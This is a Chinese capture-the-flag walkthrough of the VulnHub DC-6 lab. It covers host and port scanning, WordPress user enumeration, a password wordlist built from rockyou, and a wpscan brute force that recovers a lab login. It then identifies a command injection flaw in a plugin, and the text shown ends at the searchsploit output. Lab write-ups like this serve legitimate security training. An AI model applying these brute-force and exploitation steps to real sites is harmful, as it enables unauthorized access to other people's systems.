vuInhub靶场实战系列-DC-6实战

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关。

免责声明
前言
一、环境配置
二、信息收集
- 2.1 主机发现
- - 2.1.1 nmap扫描存活主机
  - 2.1.2 arp-scan扫描存活主机
- 2.2 端口扫描
- 2.3 指纹识别
- - 2.3.1 尝试指纹识别
  - 2.3.2 修改host文件
  - 2.3.3 再次进行指纹识别
  - 2.3.4 浏览器访问
  - 2.3.5 Wappalyzer插件web指纹信息收集
- 2.4 目录扫描
- - 2.4.1 dirb命令目录扫描
  - 2.4.2 dirsearch命令目录扫描
- 2.5 尝试访问
- - 2.5.1 尝试访问wp-admin
  - 2.5.2 尝试访问wp-includes
三、渗透测试
- 3.1 wpscan爆破用户名
- - 3.1.1 爆破用户名
  - 3.1.2 保存用户名列表
- 3.2 生成密码字典
- 3.3 网页爆破
- - 3.3.1 wpscan爆破
  - 3.3.2 hydra爆破
- 3.4 mark用户相关
- - 3.4.1 登录页面
  - 3.4.2 Tools插件
  - 3.4.3 漏洞搜索
  - 3.4.4 查看poc文件
  - 3.4.5 运行poc文件
  - 3.4.6 反弹shell
  - - 3.4.6.1 kali监听6666端口
    - 3.4.6.2 反弹shell
    - 3.4.6.3 调用标准终端
  - 3.4.7 尝试suid提权
  - 3.4.8 更多系统信息
- 3.5 graham用户相关
- - 3.5.1 切换graham用户
  - 3.5.2 再次尝试sudo提权
  - 3.5.3 bash写入backups.sh
- 3.6 jens用户相关
- - 3.6.1 切换jens用户
  - 3.6.2 查看suid可执行的命令
  - 3.6.3 查看sudo可执行的命令
- 3.7 nmap提权
- - 3.7.1 创建shell.nse文件
  - 3.7.2 执行shell.nse文件
  - 3.7.3 查看flag
渗透总结
参考文章

前言

今日测试内容渗透dc-6靶机：

Vulnhub是一个提供各种漏洞环境的靶场平台，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞。
本文将介绍dc-6靶机渗透测试，内容包括nmap扫描，arp-scan扫描、whatweb及Wappalyzer网站指纹识别、dirb目录扫描或者dirsearch目录扫描、wpscan爆破wordpress用户名、生成密码字典、wpscan爆破登录页,xhydra爆破网页,最终使用nmap提取获得root权限，linux内核提权等内容。

DESCRIPTION
DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
This isn’t an overly difficult challenge so should be great for beginners.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

一、环境配置

靶机信息

官方下载链接	https://www.vulnhub.com/entry/dc-6,315/
发布日期	2019年4月29日
靶场环境大小	619MB
作者	DCAU
系列	DC
难度	★☆☆☆☆

渗透测试环境配置，请参考作者前面的内容，不再赘述：

vuInhub靶场实战系列-DC-2实战：https://editor.csdn.net/md/?articleId=139026849

二、信息收集

2.1 主机发现

2.1.1 nmap扫描存活主机

┌──(root㉿kali)-[/home/kali]
└─# nmap -sP 192.168.6.0/24           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 11:04 EDT
Nmap scan report for 192.168.6.1
Host is up (0.00037s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.6.2
Host is up (0.00045s latency).
MAC Address: 00:50:56:F5:7B:9F (VMware)
Nmap scan report for 192.168.6.157
Host is up (0.00050s latency).
MAC Address: 00:0C:29:C2:C2:87 (VMware)
Nmap scan report for 192.168.6.254
Host is up (0.00037s latency).
MAC Address: 00:50:56:F1:DB:25 (VMware)
Nmap scan report for 192.168.6.66
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 28.09 seconds

2.1.2 arp-scan扫描存活主机

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l           
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.6.66
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1	00:50:56:c0:00:08	VMware, Inc.
192.168.6.2	00:50:56:f5:7b:9f	VMware, Inc.
192.168.6.157	00:0c:29:c2:c2:87	VMware, Inc.
192.168.6.254	00:50:56:f1:db:25	VMware, Inc.4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.324 seconds (110.15 hosts/sec). 4 responded

综上所示，排除kali攻击机IP，得靶场信息：
IP地址：192.168.6.157
MAC地址：00:0c:29:c2:c2:87

2.2 端口扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA dc-7 192.168.6.157
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 11:07 EDT
Nmap scan report for 192.168.6.157
Host is up (0.00044s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Did not follow redirect to http://wordy/
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 00:0C:29:C2:C2:87 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.35 seconds

nmap端口扫描显示，靶机开放的端口有22和80端口，
22端口：ssh服务
80端口：http服务

2.3 指纹识别

2.3.1 尝试指纹识别

┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.157
WhatWeb report for http://192.168.6.157
Status    : 301 Moved Permanently
Title     : <None>
IP        : 192.168.6.157
Country   : RESERVED, ZZSummary   : Apache[2.4.25], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], RedirectLocation[http://wordy/], UncommonHeaders[x-redirect-by]Detected Plugins:
[ Apache ]The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Version      : 2.4.25 (from HTTP Server Header)Google Dorks: (3)Website     : http://httpd.apache.org/[ HTTPServer ]HTTP server header string. This plugin also attempts to identify the operating system from the server header. OS           : Debian LinuxString       : Apache/2.4.25 (Debian) (from server string)[ RedirectLocation ]HTTP Server string location. used with http-status 301 and 302 String       : http://wordy/ (from location)[ UncommonHeaders ]Uncommon HTTP server headers. The blacklist includes all the standard headers and many non standard but common ones. Interesting but fairly common headers should have their own plugins, eg. x-powered-by, server and x-aspnet-version. Info about headers can be found at www.http-stats.com String       : x-redirect-by (from headers)HTTP Headers:HTTP/1.1 301 Moved PermanentlyDate: Tue, 28 May 2024 15:11:47 GMTServer: Apache/2.4.25 (Debian)X-Redirect-By: WordPressLocation: http://wordy/Content-Length: 0Connection: closeContent-Type: text/html; charset=UTF-8

结果显示：靶机为wordpress CMS内容管理器，没有获得wordpress版本信息，被重定向，解决方案进行下一步操作

2.3.2 修改host文件

向hosts文件中添加以下内容
192.168.6.157 wordy

──(root㉿kali)-[/home/kali]
└─# vim /etc/hosts┌──(root㉿kali)-[/home/kali]
└─# cat /etc/hosts  
127.0.0.1	localhost
127.0.1.1	kali# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.6.154 dc-2
192.168.6.157 wordy

2.3.3 再次进行指纹识别

┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.157
WhatWeb report for http://192.168.6.157
Status    : 301 Moved Permanently
Title     : <None>
IP        : 192.168.6.157
Country   : RESERVED, ZZSummary   : Apache[2.4.25], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], RedirectLocation[http://wordy/], UncommonHeaders[x-redirect-by]Detected Plugins:
[ Apache ]The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Version      : 2.4.25 (from HTTP Server Header)Google Dorks: (3)Website     : http://httpd.apache.org/[ HTTPServer ]HTTP server header string. This plugin also attempts to identify the operating system from the server header. OS           : Debian LinuxString       : Apache/2.4.25 (Debian) (from server string)[ RedirectLocation ]HTTP Server string location. used with http-status 301 and 302 String       : http://wordy/ (from location)[ UncommonHeaders ]Uncommon HTTP server headers. The blacklist includes all the standard headers and many non standard but common ones. Interesting but fairly common headers should have their own plugins, eg. x-powered-by, server and x-aspnet-version. Info about headers can be found at www.http-stats.com String       : x-redirect-by (from headers)HTTP Headers:HTTP/1.1 301 Moved PermanentlyDate: Tue, 28 May 2024 15:25:30 GMTServer: Apache/2.4.25 (Debian)X-Redirect-By: WordPressLocation: http://wordy/Content-Length: 0Connection: closeContent-Type: text/html; charset=UTF-8WhatWeb report for http://wordy/
Status    : 200 OK
Title     : Wordy &#8211; Just another WordPress site
IP        : 192.168.6.157
Country   : RESERVED, ZZSummary   : Apache[2.4.25], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], JQuery[1.12.4], MetaGenerator[WordPress 5.1.1], PoweredBy[WordPress], Script[text/javascript], UncommonHeaders[link], WordPress[5.1.1]Detected Plugins:
[ Apache ]The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Version      : 2.4.25 (from HTTP Server Header)Google Dorks: (3)Website     : http://httpd.apache.org/[ HTML5 ]HTML version 5, detected by the doctype declaration [ HTTPServer ]HTTP server header string. This plugin also attempts to identify the operating system from the server header. OS           : Debian LinuxString       : Apache/2.4.25 (Debian) (from server string)[ JQuery ]A fast, concise, JavaScript that simplifies how to traverse HTML documents, handle events, perform animations, and add AJAX. Version      : 1.12.4Website     : http://jquery.com/[ MetaGenerator ]This plugin identifies meta generator tags and extracts its value. String       : WordPress 5.1.1[ PoweredBy ]This plugin identifies instances of 'Powered by x' text and attempts to extract the value for x. String       : WordPress[ Script ]This plugin detects instances of script HTML elements and returns the script language/type. String       : text/javascript[ UncommonHeaders ]Uncommon HTTP server headers. The blacklist includes all the standard headers and many non standard but common ones. Interesting but fairly common headers should have their own plugins, eg. x-powered-by, server and x-aspnet-version. Info about headers can be found at www.http-stats.com String       : link (from headers)[ WordPress ]WordPress is an opensource blogging system commonly used as a CMS. Version      : 5.1.1Aggressive function available (check plugin file or details).Google Dorks: (1)Website     : http://www.wordpress.org/HTTP Headers:HTTP/1.1 200 OKDate: Tue, 28 May 2024 15:25:32 GMTServer: Apache/2.4.25 (Debian)Link: <http://wordy/index.php/wp-json/>; rel="https://api.w.org/"Link: <http://wordy/>; rel=shortlinkVary: Accept-EncodingContent-Encoding: gzipContent-Length: 18051Connection: closeContent-Type: text/html; charset=UTF-8

2.3.4 浏览器访问

dc-6欢迎页

2.3.5 Wappalyzer插件web指纹信息收集

wappalyzer信息收集
相关技术参数如下表：

项目名称	技术参数
内容管理系统	WordPress5.1.1
编程语言	php
博客	WordPress5.1.1
操作系统	Debian
安装字体	Google Font API,Twitter Emoji_(Twemoji)
数据库	MySQL
杂项	RSS
JavaScript库	jQuery Migrate 1.4.1,jQuery1.12.4
Web 服务器	Apache HTTPServer 2.4.25
WordPress themes	Twenty Seventeen

综上所述，获得WordPress版本信息：
Version : 5.1.1

2.4 目录扫描

2.4.1 dirb命令目录扫描

┌──(root㉿kali)-[/home/kali]
└─# dirb http://192.168.6.157     -----------------
DIRB v2.22    
By The Dark Raver
-----------------START_TIME: Tue May 28 12:02:29 2024
URL_BASE: http://192.168.6.157/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612                                                          ---- Scanning URL: http://192.168.6.157/ ----
+ http://192.168.6.157/index.php (CODE:200|SIZE:53227)                                                                                 
+ http://192.168.6.157/server-status (CODE:403|SIZE:301)                                                                               
==> DIRECTORY: http://192.168.6.157/wp-admin/                                                                                          
==> DIRECTORY: http://192.168.6.157/wp-content/                                                                                        
==> DIRECTORY: http://192.168.6.157/wp-includes/                                                                                       
+ http://192.168.6.157/xmlrpc.php (CODE:405|SIZE:42)                                                                                   ---- Entering directory: http://192.168.6.157/wp-admin/ ----
+ http://192.168.6.157/wp-admin/admin.php (CODE:302|SIZE:0)                                                                            
==> DIRECTORY: http://192.168.6.157/wp-admin/css/                                                                                      
==> DIRECTORY: http://192.168.6.157/wp-admin/images/                                                                                   
==> DIRECTORY: http://192.168.6.157/wp-admin/includes/                                                                                 
+ http://192.168.6.157/wp-admin/index.php (CODE:302|SIZE:0)                                                                            
==> DIRECTORY: http://192.168.6.157/wp-admin/js/                                                                                       
==> DIRECTORY: http://192.168.6.157/wp-admin/maint/                                                                                    
==> DIRECTORY: http://192.168.6.157/wp-admin/network/                                                                                  
==> DIRECTORY: http://192.168.6.157/wp-admin/user/                                                                                     ---- Entering directory: http://192.168.6.157/wp-content/ ----
+ http://192.168.6.157/wp-content/index.php (CODE:200|SIZE:0)                                                                          
==> DIRECTORY: http://192.168.6.157/wp-content/plugins/                                                                                
==> DIRECTORY: http://192.168.6.157/wp-content/themes/                                                                                 
==> DIRECTORY: http://192.168.6.157/wp-content/uploads/                                                                                ---- Entering directory: http://192.168.6.157/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.6.157/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.6.157/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.6.157/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.6.157/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.6.157/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.6.157/wp-admin/network/ ----
+ http://192.168.6.157/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                                    
+ http://192.168.6.157/wp-admin/network/index.php (CODE:302|SIZE:0)                                                                    ---- Entering directory: http://192.168.6.157/wp-admin/user/ ----
+ http://192.168.6.157/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                                       
+ http://192.168.6.157/wp-admin/user/index.php (CODE:302|SIZE:0)                                                                       ---- Entering directory: http://192.168.6.157/wp-content/plugins/ ----
+ http://192.168.6.157/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                                  ---- Entering directory: http://192.168.6.157/wp-content/themes/ ----
+ http://192.168.6.157/wp-content/themes/index.php (CODE:200|SIZE:0)                                                                   ---- Entering directory: http://192.168.6.157/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)-----------------
END_TIME: Tue May 28 12:03:03 2024
DOWNLOADED: 32284 - FOUND: 12

2.4.2 dirsearch命令目录扫描

┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.6.157 -e * -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481Output File: /home/kali/reports/_192.168.6.157/_24-05-28_12-05-18.txtTarget: http://192.168.6.157/[12:05:18] Starting: 
[12:05:21] 403 -  299B  - /.ht_wsr.txt                                      
[12:05:21] 403 -  302B  - /.htaccess.orig                                   
[12:05:21] 403 -  302B  - /.htaccess.save
[12:05:21] 403 -  304B  - /.htaccess.sample
[12:05:21] 403 -  302B  - /.htaccess.bak1                                   
[12:05:22] 403 -  300B  - /.htaccess_sc
[12:05:22] 403 -  300B  - /.htaccessBAK
[12:05:22] 403 -  301B  - /.htaccessOLD2                                    
[12:05:22] 403 -  292B  - /.htm                                             
[12:05:22] 403 -  293B  - /.html
[12:05:22] 403 -  302B  - /.htpasswd_test                                   
[12:05:22] 403 -  298B  - /.htpasswds                                       
[12:05:22] 403 -  302B  - /.htaccess_orig                                   
[12:05:22] 403 -  299B  - /.httr-oauth                                      
[12:05:22] 403 -  303B  - /.htaccess_extra                                  
[12:05:22] 403 -  300B  - /.htaccessOLD                                     
[12:05:24] 403 -  292B  - /.php                                             
[12:05:24] 403 -  293B  - /.php3                                            
[12:06:05] 200 -   18KB - /index.php                                        
[12:06:09] 200 -    7KB - /license.txt                                      
[12:06:28] 200 -    3KB - /readme.html                                      
[12:06:31] 403 -  301B  - /server-status                                    
[12:06:31] 403 -  302B  - /server-status/                                   
[12:06:50] 301 -  317B  - /wp-admin  ->  http://192.168.6.157/wp-admin/     
[12:06:50] 302 -    0B  - /wp-admin/  ->  http://wordy/wp-login.php?redirect_to=http%3A%2F%2F192.168.6.157%2Fwp-admin%2F&reauth=1
[12:06:51] 200 -    0B  - /wp-config.php                                    
[12:06:51] 500 -    3KB - /wp-admin/setup-config.php                        
[12:06:51] 400 -    1B  - /wp-admin/admin-ajax.php                          
[12:06:51] 200 -  517B  - /wp-admin/install.php                             
[12:06:51] 301 -  319B  - /wp-content  ->  http://192.168.6.157/wp-content/ 
[12:06:51] 200 -    0B  - /wp-content/
[12:06:51] 403 -  324B  - /wp-content/plugins/akismet/admin.php             
[12:06:51] 500 -    0B  - /wp-content/plugins/hello.php                     
[12:06:51] 403 -  326B  - /wp-content/plugins/akismet/akismet.php           
[12:06:51] 200 -  456B  - /wp-content/uploads/                              
[12:06:52] 200 -    1KB - /wp-login.php                                     
[12:06:52] 302 -    0B  - /wp-signup.php  ->  http://wordy/wp-login.php?action=register
[12:06:52] 500 -    0B  - /wp-includes/rss-functions.php                    
[12:06:52] 200 -    0B  - /wp-cron.php                                      
[12:06:52] 200 -    4KB - /wp-includes/                                     
[12:06:52] 301 -  320B  - /wp-includes  ->  http://192.168.6.157/wp-includes/
[12:06:53] 405 -   42B  - /xmlrpc.php                                       Task Completed

综上所述，发现一些特别的信息：

页面名称	目录地址
后台管理页面	/wp-admin -> http://192.168.6.157/wp-admin/
文件包含页面	/wp-includes -> http://192.168.6.157/wp-includes/
网站内容页面	/wp-content -> http://192.168.6.157/wp-content/
网站注册页面	/wp-signup.php -> http://wordy/wp-login.php?action=register

dc-6靶机存在文件包含漏洞，越权访问等漏洞，O(∩_∩)O哈哈~

2.5 尝试访问

2.5.1 尝试访问wp-admin

链接地址：http://192.168.6.157/wp-admin/
返回页面：

2.5.2 尝试访问wp-includes

链接地址：http://192.168.6.157/wp-includes/
返回页面：

不登录，无法访问，思路：爆破用户名和密码

三、渗透测试

3.1 wpscan爆破用户名

3.1.1 爆破用户名

┌──(root㉿kali)-[/home/kali]
└─# wpscan --url http://wordy -e u
_________________________________________________________________          _______   _____\ \        / /  __ \ / ____|\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®\ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \\  /\  /  | |     ____) | (__| (_| | | | |\/  \/   |_|    |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 3.8.25Sponsored by Automattic - https://automattic.com/@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.[+] URL: http://wordy/ [192.168.6.157]
[+] Started: Tue May 28 12:44:35 2024Interesting Finding(s):[+] Headers| Interesting Entry: Server: Apache/2.4.25 (Debian)| Found By: Headers (Passive Detection)| Confidence: 100%[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php| Found By: Direct Access (Aggressive Detection)| Confidence: 100%| References:|  - http://codex.wordpress.org/XML-RPC_Pingback_API|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/|  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/[+] WordPress readme found: http://wordy/readme.html| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] Upload directory has listing enabled: http://wordy/wp-content/uploads/| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php| Found By: Direct Access (Aggressive Detection)| Confidence: 60%| References:|  - https://www.iplocation.net/defend-wordpress-from-ddos|  - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).| Found By: Rss Generator (Passive Detection)|  - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>|  - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>[+] WordPress theme in use: twentyseventeen| Location: http://wordy/wp-content/themes/twentyseventeen/| Last Updated: 2024-04-02T00:00:00.000Z| Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt| [!] The version is out of date, the latest version is 3.6| Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1| Style Name: Twenty Seventeen| Style URI: https://wordpress.org/themes/twentyseventeen/| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...| Author: the WordPress team| Author URI: https://wordpress.org/|| Found By: Css Style In Homepage (Passive Detection)|| Version: 2.1 (80% confidence)| Found By: Style (Passive Detection)|  - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'[+] Enumerating Users (via Passive and Aggressive Methods)Brute Forcing Author IDs - Time: 00:00:00 <=====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00[i] User(s) Identified:[+] admin| Found By: Rss Generator (Passive Detection)| Confirmed By:|  Wp Json Api (Aggressive Detection)|   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1|  Author Id Brute Forcing - Author Pattern (Aggressive Detection)|  Login Error Messages (Aggressive Detection)[+] graham| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] jens| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] mark| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] sarah| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register[+] Finished: Tue May 28 12:44:44 2024
[+] Requests Done: 71
[+] Cached Requests: 6
[+] Data Sent: 16.392 KB
[+] Data Received: 13.463 MB
[+] Memory used: 190.902 MB
[+] Elapsed time: 00:00:08

获得5个用户名：

用户名	admin	graham	jens	mark	sarah

3.1.2 保存用户名列表

依次执行以下命令，将用户名保存到users.txt文件中

──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# echo "admin\ngraham\njens\nmark\nsarah"> users.txt ┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# ls
users.txt┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# cat users.txt                        
admin
graham
jens
mark
sarah

保存用户名字典成功

3.2 生成密码字典

在访问靶场官网的时候，有以下提示：

官方文档提示

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# ls
passwords.txt  users.txt

生成密码字典password.txt成功。

3.3 网页爆破

我们可以使用wpscan和xhydra爆破网页登录页，下面逐一介绍。

3.3.1 wpscan爆破

耗费时间约6分33秒！

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# wpscan --url http://wordy -U users.txt -P passwords.txt 
_________________________________________________________________          _______   _____\ \        / /  __ \ / ____|\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®\ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \\  /\  /  | |     ____) | (__| (_| | | | |\/  \/   |_|    |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 3.8.25Sponsored by Automattic - https://automattic.com/@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[+] URL: http://wordy/ [192.168.6.157]
[+] Started: Tue May 28 13:43:00 2024Interesting Finding(s):[+] Headers| Interesting Entry: Server: Apache/2.4.25 (Debian)| Found By: Headers (Passive Detection)| Confidence: 100%[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php| Found By: Direct Access (Aggressive Detection)| Confidence: 100%| References:|  - http://codex.wordpress.org/XML-RPC_Pingback_API|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/|  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/[+] WordPress readme found: http://wordy/readme.html| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] Upload directory has listing enabled: http://wordy/wp-content/uploads/| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php| Found By: Direct Access (Aggressive Detection)| Confidence: 60%| References:|  - https://www.iplocation.net/defend-wordpress-from-ddos|  - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).| Found By: Rss Generator (Passive Detection)|  - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>|  - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>[+] WordPress theme in use: twentyseventeen| Location: http://wordy/wp-content/themes/twentyseventeen/| Last Updated: 2024-04-02T00:00:00.000Z| Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt| [!] The version is out of date, the latest version is 3.6| Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1| Style Name: Twenty Seventeen| Style URI: https://wordpress.org/themes/twentyseventeen/| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...| Author: the WordPress team| Author URI: https://wordpress.org/|| Found By: Css Style In Homepage (Passive Detection)|| Version: 2.1 (80% confidence)| Found By: Style (Passive Detection)|  - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'[+] Enumerating All Plugins (via Passive Methods)[i] No plugins Found.[+] Enumerating Config Backups (via Passive and Aggressive Methods)Checking Config Backups - Time: 00:00:00 <=========================================================> (137 / 137) 100.00% Time: 00:00:00[i] No Config Backups Found.[+] Performing password attack on Xmlrpc against 5 user/s
[SUCCESS] - mark / helpdesk01                                                                                                           
Trying jens / !lak019b Time: 00:06:33 <===============================================           > (12547 / 15215) 82.46%  ETA: ??:??:??[!] Valid Combinations Found:| Username: mark, Password: helpdesk01[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register[+] Finished: Tue May 28 13:49:47 2024
[+] Requests Done: 12720
[+] Cached Requests: 5
[+] Data Sent: 6.222 MB
[+] Data Received: 7.74 MB
[+] Memory used: 312.531 MB
[+] Elapsed time: 00:06:46

3.3.2 hydra爆破

使用xhydra爆破网页登录页面，
参数设置如下：
Target :192.168.6.157
Protocol:http-post-form

Username List:/home/kali/dev_run_app/vulhub/dc-6/users.txt
Password List:/home/kali/dev_run_app/vulhub/dc-6/passwords.txt

Specific参数设置：
http/https URL:/wp-admin.php:log=^USER&pwd=^PASS:s=logout

最后点击start

无果，O(∩_∩)O哈哈~ pass

综上所述，获得一个用户名和密码：

序号	用户名	密码
1	mark	helpdesk01

3.4 mark用户相关

3.4.1 登录页面

利用爆破获得的用户和密码登录管理页面
管理页面：http://192.168.6.157/wp-admin/

3.4.2 Tools插件

登录成功以后，发现Activity_monitor插件

尝试使用whoami：

尝试id命令：

综上所述，可以发现有RCE（远程命令执行）漏洞

3.4.3 漏洞搜索

┌──(root㉿kali)-[/home/kali]
└─# searchsploit -w Activity monitor
----------------------------------------------------------------------------------------------------------------- --------------------------------------------Exploit Title                                                                                                   |  URL
----------------------------------------------------------------------------------------------------------------- --------------------------------------------
Activity Monitor 2002 2.6 - Remote Denial of Service                                                             | https://www.exploit-db.com/exploits/22690
RedHat Linux 6.0/6.1/6.2 - 'pam_console' Monitor Activity After Logout                                           | https://www.exploit-db.com/exploits/19900
WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection                         | https://www.exploit-db.com/exploits/45274
